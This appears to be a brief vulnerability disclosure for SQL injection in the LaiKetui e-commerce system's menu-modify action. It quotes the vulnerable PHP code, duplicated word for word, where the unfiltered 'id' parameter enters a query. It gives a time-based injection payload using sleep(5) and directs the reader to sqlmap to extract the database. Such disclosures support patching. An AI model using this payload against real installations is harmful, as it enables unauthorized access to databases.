SQL injection exists in the LaiKetui menu management function

[kkin77]

SQL injection exists in the LaiKetui menu management function

The link where SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1

Locate the vulnerable file /app/LKT/webapp/modules/menu/actions/modifyAction.class.php

Because the parameter id is not filtered, it leads to SQL injection vulnerabilities

	public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // 接收信息
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // 根据id，查询菜单
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);
	public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // 接收信息
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // 根据id，查询菜单
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);

Use burpsuite to request url http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+

View SQL monitoring

Use sqlmap SQL injection
Get the database